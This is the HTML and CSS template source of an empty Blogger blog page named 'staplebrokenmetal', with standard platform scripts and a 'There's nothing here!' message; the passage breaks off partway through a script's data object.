.centered{\nbox-sizing:border-box;\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-box-orient:vertical;\n-webkit-box-direction:normal;\n-webkit-flex-direction:column;\n-ms-flex-direction:column;\nflex-direction:column;\nmargin:0 auto;\nmax-width:922px;\nmin-height:100vh;\npadding:24px 0\n}\n.page_body .centered>*{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.page_body .centered>#footer{\nmargin-top:auto\n}\n.blog-name{\nmargin:24px 0 16px 0\n}\n.item-view .blog-name,.sticky .blog-name{\nbox-sizing:border-box;\nmargin-left:36px;\nmin-height:48px;\nopacity:1;\npadding-top:12px\n}\n.blog-name .subscribe-section-container{\nmargin-bottom:32px;\ntext-align:center;\n-webkit-transition-property:opacity;\ntransition-property:opacity;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s\n}\n.item-view .blog-name .subscribe-section-container,.sticky .blog-name .subscribe-section-container{\nmargin:0 0 8px 0\n}\n.blog-name .PageList{\nmargin-top:16px;\npadding-top:8px;\ntext-align:center\n}\n.blog-name .PageList .overflowable-contents{\nwidth:100%\n}\n.blog-name .PageList h3.title{\ncolor:#ffffff;\nmargin:8px auto;\ntext-align:center;\nwidth:100%\n}\n.centered-top-container .blog-name{\n-webkit-transition-property:opacity;\ntransition-property:opacity;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s\n}\n.item-view .return_link{\nmargin-bottom:12px;\nmargin-top:12px;\nposition:absolute\n}\n.item-view .blog-name{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-flex-wrap:wrap;\n-ms-flex-wrap:wrap;\nflex-wrap:wrap;\nmargin:0 48px 27px 48px\n}\n.item-view .subscribe-section-container{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.item-view #header,.item-view .Header{\nmargin-bottom:5px;\nmargin-right:15px\n}\n.item-view .sticky .Header{\nmargin-bottom:0\n}\n.item-view .Header p{\nmargin:10px 0 0 0;\ntext-align:left\n}\n.item-view .post-share-buttons-bottom{\nmargin-right:16px\n}\n.sticky{\nbackground:#ffffff;\nbox-shadow:0 0 20px 0 rgba(0,0,0,.7);\nbox-sizing:border-box;\nmargin-left:0\n}\n.sticky #header{\nmargin-bottom:8px;\nmargin-right:8px\n}\n.sticky .centered-top{\nmargin:4px auto;\nmax-width:890px;\nmin-height:48px\n}\n.sticky .blog-name{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nmargin:0 48px\n}\n.sticky .blog-name #header{\n-webkit-box-flex:0;\n-webkit-flex:0 1 auto;\n-ms-flex:0 1 auto;\nflex:0 1 auto;\n-webkit-box-ordinal-group:2;\n-webkit-order:1;\n-ms-flex-order:1;\norder:1;\noverflow:hidden\n}\n.sticky .blog-name .subscribe-section-container{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-box-ordinal-group:3;\n-webkit-order:2;\n-ms-flex-order:2;\norder:2\n}\n.sticky .Header h1{\noverflow:hidden;\ntext-overflow:ellipsis;\nwhite-space:nowrap;\nmargin-right:-10px;\nmargin-bottom:-10px;\npadding-right:10px;\npadding-bottom:10px\n}\n.sticky .Header p{\ndisplay:none\n}\n.sticky .PageList{\ndisplay:none\n}\n.search-focused>*{\nvisibility:visible\n}\n.search-focused .hamburger-menu{\nvisibility:visible\n}\n.item-view .search-focused .blog-name,.sticky .search-focused .blog-name{\nopacity:0\n}\n.centered-bottom,.centered-top-container,.centered-top-placeholder{\npadding:0 16px\n}\n.centered-top{\nposition:relative\n}\n.item-view .centered-top.search-focused .subscribe-section-container,.sticky .centered-top.search-focused .subscribe-section-container{\nopacity:0\n}\n.page_body.has-vertical-ads .centered .centered-bottom{\ndisplay:inline-block;\nwidth:calc(100% - 176px)\n}\n.Header h1{\ncolor:#ffffff;\nfont:bold 45px Roboto, sans-serif;\nline-height:normal;\nmargin:0 0 13px 0;\ntext-align:center;\nwidth:100%\n}\n.Header h1 a,.Header h1 a:hover,.Header h1 a:visited{\ncolor:#ffffff\n}\n.item-view .Header h1,.sticky .Header h1{\nfont-size:24px;\nline-height:24px;\nmargin:0;\ntext-align:left\n}\n.sticky .Header h1{\ncolor:#757575\n}\n.sticky .Header h1 a,.sticky .Header h1 a:hover,.sticky .Header h1 a:visited{\ncolor:#757575\n}\n.Header p{\ncolor:#ffffff;\nmargin:0 0 13px 0;\nopacity:.8;\ntext-align:center\n}\n.widget .title{\nline-height:28px\n}\n.BlogArchive li{\nfont-size:16px\n}\n.BlogArchive .post-count{\ncolor:#757575\n}\n#page_body .FeaturedPost,.Blog .blog-posts .post-outer-container{\nbackground:#ffffff;\nmin-height:40px;\npadding:30px 40px;\nwidth:auto\n}\n.Blog .blog-posts .post-outer-container:last-child{\nmargin-bottom:0\n}\n.Blog .blog-posts .post-outer-container .post-outer{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.post-outer-container{\nmargin-bottom:16px\n}\n.post:first-child{\nmargin-top:0\n}\n.post .thumb{\nfloat:left;\nheight:20%;\nwidth:20%\n}\n.post-share-buttons-bottom,.post-share-buttons-top{\nfloat:right\n}\n.post-share-buttons-bottom{\nmargin-right:24px\n}\n.post-footer,.post-header{\nclear:left;\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0;\nwidth:inherit\n}\n.blog-pager{\ntext-align:center\n}\n.blog-pager a{\ncolor:#2196f3\n}\n.blog-pager a:visited{\ncolor:#2196f3\n}\n.blog-pager a:hover{\ncolor:#2196f3\n}\n.post-title{\nfont:bold 22px Roboto, sans-serif;\nfloat:left;\nmargin:0 0 8px 0;\nmax-width:calc(100% - 48px)\n}\n.post-title a{\nfont:bold 30px Roboto, sans-serif\n}\n.post-title,.post-title a,.post-title a:hover,.post-title a:visited{\ncolor:#212121\n}\n.post-body{\ncolor:#757575;\nfont:15px Roboto, sans-serif;\nline-height:1.6em;\nmargin:1.5em 0 2em 0;\ndisplay:block\n}\n.post-body img{\nheight:inherit\n}\n.post-body .snippet-thumbnail{\nfloat:left;\nmargin:0;\nmargin-right:2em;\nmax-height:128px;\nmax-width:128px\n}\n.post-body .snippet-thumbnail img{\nmax-width:100%\n}\n.main .FeaturedPost .widget-content{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.FeaturedPost img{\nmargin-top:2em\n}\n.FeaturedPost .snippet-container{\nmargin:2em 0\n}\n.FeaturedPost .snippet-container p{\nmargin:0\n}\n.FeaturedPost .snippet-thumbnail{\nfloat:none;\nheight:auto;\nmargin-bottom:2em;\nmargin-right:0;\noverflow:hidden;\nmax-height:calc(600px + 2em);\nmax-width:100%;\ntext-align:center;\nwidth:100%\n}\n.FeaturedPost .snippet-thumbnail img{\nmax-width:100%;\nwidth:100%\n}\n.byline{\ncolor:rgba(0, 0, 0, 0.54);\ndisplay:inline-block;\nline-height:24px;\nmargin-top:8px;\nvertical-align:top\n}\n.byline.post-author:first-child{\nmargin-right:0\n}\n.byline.reactions .reactions-label{\nline-height:22px;\nvertical-align:top\n}\n.byline.post-share-buttons{\nposition:relative;\ndisplay:inline-block;\nmargin-top:0;\nwidth:100%\n}\n.byline.post-share-buttons .sharing{\nfloat:right\n}\n.flat-button.ripple:hover{\nbackground-color:rgba(33,150,243,.12)\n}\n.flat-button.ripple .splash{\nbackground-color:rgba(33,150,243,.4)\n}\na.timestamp-link,a:active.timestamp-link,a:visited.timestamp-link{\ncolor:inherit;\nfont:inherit;\ntext-decoration:inherit\n}\n.post-share-buttons{\nmargin-left:0\n}\n.clear-sharing{\nmin-height:24px\n}\n.comment-link{\ncolor:#2196f3;\nposition:relative\n}\n.comment-link .num_comments{\nmargin-left:8px;\nvertical-align:top\n}\n#comment-holder .continue{\ndisplay:none\n}\n#comment-editor{\nmargin-bottom:20px;\nmargin-top:20px\n}\n#comments .comment-form h4,#comments h3.title{\nposition:absolute;\nclip:rect(1px,1px,1px,1px);\npadding:0;\nborder:0;\nheight:1px;\nwidth:1px;\noverflow:hidden\n}\n.post-filter-message{\nbackground-color:rgba(0,0,0,.7);\ncolor:#fff;\ndisplay:table;\nmargin-bottom:16px;\nwidth:100%\n}\n.post-filter-message div{\ndisplay:table-cell;\npadding:15px 28px\n}\n.post-filter-message div:last-child{\npadding-left:0;\ntext-align:right\n}\n.post-filter-message a{\nwhite-space:nowrap\n}\n.post-filter-message .search-label,.post-filter-message .search-query{\nfont-weight:700;\ncolor:#2196f3\n}\n#blog-pager{\nmargin:2em 0\n}\n#blog-pager a{\ncolor:#2196f3;\nfont-size:14px\n}\n.subscribe-button{\nborder-color:#ffffff;\ncolor:#ffffff\n}\n.sticky .subscribe-button{\nborder-color:#757575;\ncolor:#757575\n}\n.tabs{\nmargin:0 auto;\npadding:0\n}\n.tabs li{\nmargin:0 8px;\nvertical-align:top\n}\n.tabs .overflow-button a,.tabs li a{\ncolor:#cccccc;\nfont:700 normal 15px Roboto, sans-serif;\nline-height:18px\n}\n.tabs .overflow-button a{\npadding:12px 8px\n}\n.overflow-popup .tabs li{\ntext-align:left\n}\n.overflow-popup li a{\ncolor:#757575;\ndisplay:block;\npadding:8px 20px\n}\n.overflow-popup li.selected a{\ncolor:#212121\n}\na.report_abuse{\nfont-weight:400\n}\n.Label li,.Label span.label-size,.byline.post-labels a{\nbackground-color:#f7f7f7;\nborder:1px solid #f7f7f7;\nborder-radius:15px;\ndisplay:inline-block;\nmargin:4px 4px 4px 0;\npadding:3px 8px\n}\n.Label a,.byline.post-labels a{\ncolor:rgba(0,0,0,0.54)\n}\n.Label ul{\nlist-style:none;\npadding:0\n}\n.PopularPosts{\nbackground-color:#eeeeee;\npadding:30px 40px\n}\n.PopularPosts .item-content{\ncolor:#757575;\nmargin-top:24px\n}\n.PopularPosts a,.PopularPosts a:hover,.PopularPosts a:visited{\ncolor:#2196f3\n}\n.PopularPosts .post-title,.PopularPosts .post-title a,.PopularPosts .post-title a:hover,.PopularPosts .post-title a:visited{\ncolor:#212121;\nfont-size:18px;\nfont-weight:700;\nline-height:24px\n}\n.PopularPosts,.PopularPosts h3.title a{\ncolor:#757575;\nfont:15px Roboto, sans-serif\n}\n.main .PopularPosts{\npadding:16px 40px\n}\n.PopularPosts h3.title{\nfont-size:14px;\nmargin:0\n}\n.PopularPosts h3.post-title{\nmargin-bottom:0\n}\n.PopularPosts .byline{\ncolor:rgba(0, 0, 0, 0.54)\n}\n.PopularPosts .jump-link{\nfloat:right;\nmargin-top:16px\n}\n.PopularPosts .post-header .byline{\nfont-size:.9em;\nfont-style:italic;\nmargin-top:6px\n}\n.PopularPosts ul{\nlist-style:none;\npadding:0;\nmargin:0\n}\n.PopularPosts .post{\npadding:20px 0\n}\n.PopularPosts .post+.post{\nborder-top:1px dashed #cccccc\n}\n.PopularPosts .item-thumbnail{\nfloat:left;\nmargin-right:32px\n}\n.PopularPosts .item-thumbnail img{\nheight:88px;\npadding:0;\nwidth:88px\n}\n.inline-ad{\nmargin-bottom:16px\n}\n.desktop-ad .inline-ad{\ndisplay:block\n}\n.adsbygoogle{\noverflow:hidden\n}\n.vertical-ad-container{\nfloat:right;\nmargin-right:16px;\nwidth:128px\n}\n.vertical-ad-container .AdSense+.AdSense{\nmargin-top:16px\n}\n.inline-ad-placeholder,.vertical-ad-placeholder{\nbackground:#ffffff;\nborder:1px solid #000;\nopacity:.9;\nvertical-align:middle;\ntext-align:center\n}\n.inline-ad-placeholder span,.vertical-ad-placeholder span{\nmargin-top:290px;\ndisplay:block;\ntext-transform:uppercase;\nfont-weight:700;\ncolor:#212121\n}\n.vertical-ad-placeholder{\nheight:600px\n}\n.vertical-ad-placeholder span{\nmargin-top:290px;\npadding:0 40px\n}\n.inline-ad-placeholder{\nheight:90px\n}\n.inline-ad-placeholder span{\nmargin-top:36px\n}\n.Attribution{\ncolor:#757575\n}\n.Attribution a,.Attribution a:hover,.Attribution a:visited{\ncolor:#2196f3\n}\n.Attribution svg{\nfill:#707070\n}\n.sidebar-container{\nbox-shadow:1px 1px 3px rgba(0,0,0,.1)\n}\n.sidebar-container,.sidebar-container .sidebar_bottom{\nbackground-color:#ffffff\n}\n.sidebar-container .navigation,.sidebar-container .sidebar_top_wrapper{\nbackground-color:#ffffff\n}\n.sidebar-container .sidebar_top{\noverflow:auto\n}\n.sidebar-container .sidebar_bottom{\nwidth:100%;\npadding-top:16px\n}\n.sidebar-container .widget:first-child{\npadding-top:0\n}\n.sidebar_top .widget.Profile{\npadding-bottom:16px\n}\n.widget.Profile{\nmargin:0;\nwidth:100%\n}\n.widget.Profile h2{\ndisplay:none\n}\n.widget.Profile h3.title{\ncolor:rgba(0,0,0,0.52);\nmargin:16px 32px\n}\n.widget.Profile .individual{\ntext-align:center\n}\n.widget.Profile .individual .profile-link{\npadding:1em\n}\n.widget.Profile .individual .default-avatar-wrapper .avatar-icon{\nmargin:auto\n}\n.widget.Profile .team{\nmargin-bottom:32px;\nmargin-left:32px;\nmargin-right:32px\n}\n.widget.Profile ul{\nlist-style:none;\npadding:0\n}\n.widget.Profile li{\nmargin:10px 0\n}\n.widget.Profile .profile-img{\nborder-radius:50%;\nfloat:none\n}\n.widget.Profile .profile-link{\ncolor:#212121;\nfont-size:.9em;\nmargin-bottom:1em;\nopacity:.87;\noverflow:hidden\n}\n.widget.Profile .profile-link.visit-profile{\nborder-style:solid;\nborder-width:1px;\nborder-radius:12px;\ncursor:pointer;\nfont-size:12px;\nfont-weight:400;\npadding:5px 20px;\ndisplay:inline-block;\nline-height:normal\n}\n.widget.Profile dd{\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0 16px\n}\n.widget.Profile location{\nmargin-bottom:1em\n}\n.widget.Profile .profile-textblock{\nfont-size:14px;\nline-height:24px;\nposition:relative\n}\nbody.sidebar-visible .page_body{\noverflow-y:scroll\n}\nbody.sidebar-visible .bg-photo-container{\noverflow-y:scroll\n}\n@media screen and (min-width:1440px){\n.sidebar-container{\nmargin-top:480px;\nmin-height:calc(100% - 480px);\noverflow:visible;\nz-index:32\n}\n.sidebar-container .sidebar_top_wrapper{\nbackground-color:#f7f7f7;\nheight:480px;\nmargin-top:-480px\n}\n.sidebar-container .sidebar_top{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nheight:480px;\n-webkit-box-orient:horizontal;\n-webkit-box-direction:normal;\n-webkit-flex-direction:row;\n-ms-flex-direction:row;\nflex-direction:row;\nmax-height:480px\n}\n.sidebar-container .sidebar_bottom{\nmax-width:284px;\nwidth:284px\n}\nbody.collapsed-header .sidebar-container{\nz-index:15\n}\n.sidebar-container .sidebar_top:empty{\ndisplay:none\n}\n.sidebar-container .sidebar_top>:only-child{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-align-self:center;\n-ms-flex-item-align:center;\nalign-self:center;\nwidth:100%\n}\n.sidebar_top_wrapper.no-items{\ndisplay:none\n}\n}\n.post-snippet.snippet-container{\nmax-height:120px\n}\n.post-snippet .snippet-item{\nline-height:24px\n}\n.post-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:#757575;\nheight:24px\n}\n.popular-posts-snippet.snippet-container{\nmax-height:72px\n}\n.popular-posts-snippet .snippet-item{\nline-height:24px\n}\n.PopularPosts .popular-posts-snippet .snippet-fade{\ncolor:#757575;\nheight:24px\n}\n.main .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#eeeeee 0,#eeeeee 20%,rgba(238, 238, 238, 0) 100%);\nbackground:linear-gradient(to left,#eeeeee 0,#eeeeee 20%,rgba(238, 238, 238, 0) 100%)\n}\n.sidebar_bottom .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%)\n}\n.profile-snippet.snippet-container{\nmax-height:192px\n}\n.has-location .profile-snippet.snippet-container{\nmax-height:144px\n}\n.profile-snippet .snippet-item{\nline-height:24px\n}\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:rgba(0, 0, 0, 0.54);\nheight:24px\n}\n@media screen and (min-width:1440px){\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%);\nbackground:linear-gradient(to left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%)\n}\n}\n@media screen and (max-width:800px){\n.blog-name{\nmargin-top:0\n}\nbody.item-view .blog-name{\nmargin:0 48px\n}\n.centered-bottom{\npadding:8px\n}\nbody.item-view .centered-bottom{\npadding:0\n}\n.page_body .centered{\npadding:10px 0\n}\nbody.item-view #header,body.item-view .widget.Header{\nmargin-right:0\n}\nbody.collapsed-header .centered-top-container .blog-name{\ndisplay:block\n}\nbody.collapsed-header .centered-top-container .widget.Header h1{\ntext-align:center\n}\n.widget.Header header{\npadding:0\n}\n.widget.Header h1{\nfont-size:24px;\nline-height:24px;\nmargin-bottom:13px\n}\nbody.item-view .widget.Header h1{\ntext-align:center\n}\nbody.item-view .widget.Header p{\ntext-align:center\n}\n.blog-name .widget.PageList{\npadding:0\n}\nbody.item-view .centered-top{\nmargin-bottom:5px\n}\n.search-action,.search-input{\nmargin-bottom:-8px\n}\n.search form{\nmargin-bottom:8px\n}\nbody.item-view .subscribe-section-container{\nmargin:5px 0 0 0;\nwidth:100%\n}\n#page_body.section div.widget.FeaturedPost,div.widget.PopularPosts{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container .post-outer{\npadding:0\n}\n.post:first-child{\nmargin:0\n}\n.post-body .snippet-thumbnail{\nmargin:0 3vw 3vw 0\n}\n.post-body .snippet-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:128px;\nmax-width:128px\n}\ndiv.widget.PopularPosts div.item-thumbnail{\nmargin:0 3vw 3vw 0\n}\ndiv.widget.PopularPosts div.item-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:88px;\nmax-width:88px\n}\n.post-title{\nline-height:1\n}\n.post-title,.post-title a{\nfont-size:20px\n}\n#page_body.section div.widget.FeaturedPost h3 a{\nfont-size:22px\n}\n.mobile-ad .inline-ad{\ndisplay:block\n}\n.page_body.has-vertical-ads .vertical-ad-container,.page_body.has-vertical-ads .vertical-ad-container ins{\ndisplay:none\n}\n.page_body.has-vertical-ads .centered .centered-bottom,.page_body.has-vertical-ads .centered .centered-top{\ndisplay:block;\nwidth:auto\n}\ndiv.post-filter-message div{\npadding:8px 16px\n}\n}\n@media screen and (min-width:1440px){\nbody{\nposition:relative\n}\nbody.item-view .blog-name{\nmargin-left:48px\n}\n.page_body{\nmargin-left:284px\n}\n.search{\nmargin-left:0\n}\n.search.focused{\nwidth:100%\n}\n.sticky{\npadding-left:284px\n}\n.hamburger-menu{\ndisplay:none\n}\nbody.collapsed-header .page_body .centered-top-container{\npadding-left:284px;\npadding-right:0;\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .search.focused{\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .blog-name{\nmargin-left:0\n}\nbody.collapsed-header.item-view .centered-top-container .search.focused{\nwidth:calc(100% - 50px)\n}\nbody.collapsed-header.item-view .centered-top-container .blog-name{\nmargin-left:40px\n}\n}\n\n--></style>\n<style id='template-skin-1' type='text/css'><!--\nbody#layout .hidden,\nbody#layout .invisible {\ndisplay: inherit;\n}\nbody#layout .navigation {\ndisplay: none;\n}\nbody#layout .page,\nbody#layout .sidebar_top,\nbody#layout .sidebar_bottom {\ndisplay: inline-block;\nleft: inherit;\nposition: relative;\nvertical-align: top;\n}\nbody#layout .page {\nfloat: right;\nmargin-left: 20px;\nwidth: 55%;\n}\nbody#layout .sidebar-container {\nfloat: right;\nwidth: 40%;\n}\nbody#layout .hamburger-menu {\ndisplay: none;\n}\n--></style>\n<style>\n .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw);}\n \n@media (max-width: 480px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w480);}}\n@media (max-width: 640px) and (min-width: 481px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w640);}}\n@media (max-width: 800px) and (min-width: 641px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w800);}}\n@media (max-width: 1200px) and (min-width: 801px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1200);}}\n/* Last tag covers anything over one higher than the previous max-size cap. */\n@media (min-width: 1201px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1600);}}\n </style>\n<script async='async' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script>\n<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>\n<meta name='google-adsense-platform-domain' content='blogspot.com'/>\n\n</head>\n<body class='version-1-3-3'>\n<a class='skip-navigation' href='#main' tabindex='0'>\nSkip to main content\n</a>\n<div class='page'>\n<div class='bg-photo-overlay'></div>\n<div class='bg-photo-container'>\n<div class='bg-photo'></div>\n</div>\n<div class='page_body'>\n<div class='centered'>\n<div class='centered-top-placeholder'></div>\n<header class='centered-top-container' role='banner'>\n<div class='centered-top'>\n<button class='svg-icon-24-button hamburger-menu flat-icon-button ripple'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_menu_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n<div class='search'>\n<button aria-label='Search' class='search-expand touch-icon-button'>\n<div class='flat-icon-button ripple'>\n<svg class='svg-icon-24 search-expand-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_search_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</button>\n<div class='section' id='search_top' name='Search (Top)'><div class='widget BlogSearch' data-version='2' id='BlogSearch1'>\n<h3 class='title'>\nSearch This Blog\n</h3>\n<div class='widget-content' role='search'>\n<form action='https://staplebrokenmetaliyro.blogspot.com/search' target='_top'>\n<div class='search-input'>\n<input aria-label='Search this blog' autocomplete='off' name='q' placeholder='Search this blog' value=''/>\n</div>\n<input class='search-action flat-button' type='submit' value='Search'/>\n</form>\n</div>\n</div></div>\n</div>\n<div class='clearboth'></div>\n<div class='blog-name container'>\n<div class='container section' id='header' name='Header'><div class='widget Header' data-version='2' id='Header1'>\n<div class='header-widget'>\n<div>\n<h1>\nstaplebrokenmetal\n</h1>\n</div>\n<p>\n</p>\n</div>\n</div></div>\n<nav role='navigation'>\n<div class='clearboth no-items section' id='page_list_top' name='Page List (Top)'>\n</div>\n</nav>\n</div>\n</div>\n</header>\n<div>\n<div class='vertical-ad-container no-items section' id='ads' name='Ads'>\n</div>\n<main class='centered-bottom' id='main' role='main' tabindex='-1'>\n<h2 class='main-heading'>Posts</h2>\n<div class='main section' id='page_body' name='Page Body'>\n<div class='widget Blog' data-version='2' id='Blog1'>\n<div class='blog-posts hfeed container'>\n<div class='post-outer-container'>\n<div class='no-posts-message'>\nThere's nothing here!\n</div>\n</div>\n</div>\n<div class='blog-posts hfeed container'>\n</div>\n<div class='blog-pager container' id='blog-pager'>\n</div>\n</div>\n</div>\n</main>\n</div>\n<footer class='footer section' id='footer' name='Footer'><div class='widget Attribution' data-version='2' id='Attribution1'>\n<div class='widget-content'>\n<div class='blogger'>\n<a href='https://www.blogger.com' rel='nofollow'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_post_blogger_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\nPowered by Blogger\n</a>\n</div>\n<div class='image-attribution'>\nTheme images by <a href=\"http://www.offset.com/photos/394244\">Michael Elkan</a>\n</div>\n</div>\n</div></footer>\n</div>\n</div>\n</div>\n<aside class='sidebar-container container sidebar-invisible' role='complementary'>\n<div class='navigation'>\n<button class='svg-icon-24-button flat-icon-button ripple sidebar-back'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_arrow_back_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n</div>\n<div class='sidebar_top_wrapper'>\n<div class='sidebar_top section' id='sidebar_top' name='Sidebar (Top)'><div class='widget Profile' data-version='2' id='Profile1'>\n<div class='wrapper solo'>\n<div class='widget-content individual'>\n<a href='https://www.blogger.com/profile/02686294779557843862' rel='nofollow'>\n<div class='default-avatar-wrapper'>\n<svg class='svg-icon-24 avatar-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_person_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</a>\n<div class='profile-info'>\n<dl class='profile-datablock'>\n<dt class='profile-data'>\n<a class='profile-link g-profile' href='https://www.blogger.com/profile/02686294779557843862' rel='author nofollow'>\nWeesepuld\n</a>\n</dt>\n</dl>\n<a class='profile-link visit-profile pill-button' href='https://www.blogger.com/profile/02686294779557843862' rel='author'>\nVisit profile\n</a>\n</div>\n</div>\n</div>\n</div></div>\n</div>\n<div class='sidebar_bottom section' id='sidebar_bottom' name='Sidebar (Bottom)'>\n<div class='widget ReportAbuse' data-version='2' id='ReportAbuse1'>\n<h3 class='title'>\n<a class='report_abuse' href='https://www.blogger.com/go/report-abuse' rel='noopener nofollow' target='_blank'>\nReport Abuse\n</a>\n</h3>\n</div></div>\n</aside>\n<script type=\"text/javascript\" src=\"https://resources.blogblog.com/blogblog/data/res/2705757678-indie_compiled.js\" async=\"true\"></script>\n\n<script type=\"text/javascript\" src=\"https://www.blogger.com/static/v1/widgets/1991725782-widgets.js\"></script>\n<script type='text/javascript'>\nwindow['__wavt'] = 'AOuZoY4GK2qUWpAkWP_wHeco6weR1gTmpQ:1745721693450';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\\x3d3967763303726818370','//staplebrokenmetaliyro.blogspot.com/','3967763303726818370');\n_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3967763303726818370', 'title': 'staplebrokenmetal', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'canonicalUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'homepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'searchUrl': 'https://staplebrokenmetaliyro.blogspot.com/search', 'canonicalHomepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'blogspotFaviconUrl': 'https://staplebrokenmetaliyro.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/rss+xml\\x22 title\\x3d\\x22staplebrokenmetal - RSS\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22service.post\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22 /\\x3e\\n', 'meTag': '\\x3clink rel\\x3d\\x22me\\x22 href\\x3d\\x22https://www.blogger.com/profile/02686294779557843862\\x22 /\\x3e\\n', 